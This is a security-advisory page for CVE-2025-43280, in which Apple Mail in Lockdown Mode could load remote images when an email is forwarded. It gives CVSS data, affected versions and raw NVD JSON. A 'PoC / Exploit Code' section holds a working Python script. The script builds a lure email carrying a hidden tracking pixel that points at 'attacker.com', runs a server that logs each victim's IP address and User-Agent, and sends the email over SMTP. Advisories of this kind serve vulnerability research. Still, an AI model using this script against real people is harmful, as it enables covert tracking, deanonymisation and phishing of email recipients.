Security Vulnerability Report
中文
CVE-2025-43280 CVSS 4.7 MEDIUM

CVE-2025-43280

Published: 2025-10-15 20:15:35
Last Modified: 2026-04-02 19:20:19
Source: [email protected]

Description

The issue was resolved by not loading remote images. This issue is fixed in iOS 18.6 and iPadOS 18.6. Forwarding an email could display remote images in Mail in Lockdown Mode.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 18.6
Apple iPadOS < 18.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43280 PoC - Apple iOS/iPadOS Mail Lockdown Mode Remote Image Disclosure # This PoC demonstrates how a malicious email can leak user information # even when the device is in Lockdown Mode, by exploiting the email forwarding feature. import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.image import MIMEImage # Step 1: Craft a malicious email with a remote tracking image def create_malicious_email(attacker_server, target_email): """ Create an email that contains a remote image URL. When the victim forwards this email in Lockdown Mode, the Mail app will automatically load the remote image, leaking the victim's IP address and other info. """ msg = MIMEMultipart('related') msg['Subject'] = 'Important Document - Please Review' msg['From'] = '[email protected]' msg['To'] = target_email # HTML body with remote tracking image html_content = f''' <html> <body> <p>Dear User,</p> <p>Please find the important document below:</p> <img src="http://{attacker_server}/tracker.gif?email={target_email}" width="1" height="1" alt="" /> <p>Best regards,<br>Sender</p> </body> </html> ''' msg_html = MIMEText(html_content, 'html') msg.attach(msg_html) return msg # Step 2: Attacker server to collect leaked information from http.server import HTTPServer, BaseHTTPRequestHandler class TrackerHandler(BaseHTTPRequestHandler): def do_GET(self): # Log the victim's information client_ip = self.client_address[0] user_agent = self.headers.get('User-Agent', 'Unknown') path = self.path print(f"[+] Victim information leaked!") print(f" IP Address: {client_ip}") print(f" User-Agent: {user_agent}") print(f" Request Path: {path}") # Return a 1x1 transparent GIF self.send_response(200) self.send_header('Content-Type', 'image/gif') self.end_headers() # Minimal 1x1 transparent GIF bytes self.wfile.write(b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x00\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;') # Step 3: Send the malicious email def send_email(smtp_server, smtp_port, username, password, msg): """Send the crafted malicious email via SMTP""" with smtplib.SMTP(smtp_server, smtp_port) as server: server.starttls() server.login(username, password) server.send_message(msg) # Step 4: Start the tracking server def start_tracker(port=8080): """Start HTTP server to collect leaked victim data""" server = HTTPServer(('0.0.0.0', port), TrackerHandler) print(f"[*] Tracker server listening on port {port}") server.serve_forever() if __name__ == '__main__': # Configuration ATTACKER_SERVER = 'attacker.com' TARGET_EMAIL = '[email protected]' SMTP_SERVER = 'smtp.malicious.com' SMTP_PORT = 587 SMTP_USER = '[email protected]' SMTP_PASS = 'password' # Create and send malicious email malicious_email = create_malicious_email(ATTACKER_SERVER, TARGET_EMAIL) # send_email(SMTP_SERVER, SMTP_PORT, SMTP_USER, SMTP_PASS, malicious_email) # Start tracking server to collect leaked data # start_tracker(8080) print("[*] PoC ready. Send the malicious email to target and wait for forwarding.") print("[*] When victim forwards the email in Lockdown Mode, tracker will receive their IP.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43280", "sourceIdentifier": "[email protected]", "published": "2025-10-15T20:15:34.893", "lastModified": "2026-04-02T19:20:19.293", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was resolved by not loading remote images. This issue is fixed in iOS 18.6 and iPadOS 18.6. Forwarding an email could display remote images in Mail in Lockdown Mode."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-940"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.6", "matchCriteriaId": "8ED4015E-C707-4A91-86B3-23100E0DFA8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.6", "matchCriteriaId": "BD9D42A7-DE2A-4D5A-8C7B-002A60148483"}]}]}], "references": [{"url": "https://support.apple.com/en-us/124147", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.